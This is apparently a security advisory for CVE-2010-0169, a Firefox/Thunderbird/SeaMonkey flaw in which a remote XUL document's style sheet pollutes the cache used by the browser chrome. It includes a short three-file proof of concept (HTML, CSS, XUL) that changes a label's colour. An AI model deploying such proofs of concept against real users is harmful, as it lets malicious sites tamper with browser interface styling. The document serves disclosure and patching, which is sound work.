Affected Versions:
Mozilla Firefox 3.6.
Mozilla Firefox 3.5.x
Mozilla Firefox 3.0.x
Mozilla Thunderbird 3.0
Mozilla SeaMonkey 2.0
Vulnerability description:
Bugtraq id: 38922
CVE (CAN) ID: CVE-2010-0169
Firefox is a popular open-source web browser.
The style sheet used by a remote XUL document may pollute the XUL cache, and the browser chrome uses this cache to determine the style of the user interface. A malicious website can exploit this vulnerability to change style attributes of the browser, such as font size and color.
<* Reference
http://secunia.com/advisories/38608/
http://www.mozilla.org/security/announce/2010/mfsa2010-14.html
*>
Test method:
The program (method) provided on this site may be offensive and is to be used only for security research and teaching. Use it at your own risk!
test.html:
<link rel="stylesheet" href="test.css" type="text/css">
<iframe src="test.xul"></iframe>
test.css:
label {
  color: red;
}
label[someAttr] {
  color: green;
}
test.xul:
<?xml-stylesheet href="test.css" type="text/css"?>
<page xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul">
  <label someAttr="true" value="This should be green"/>
</page>
SEBUG Security suggestions:
Vendor patch:
Mozilla
-------
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:
http://www.mozilla.org/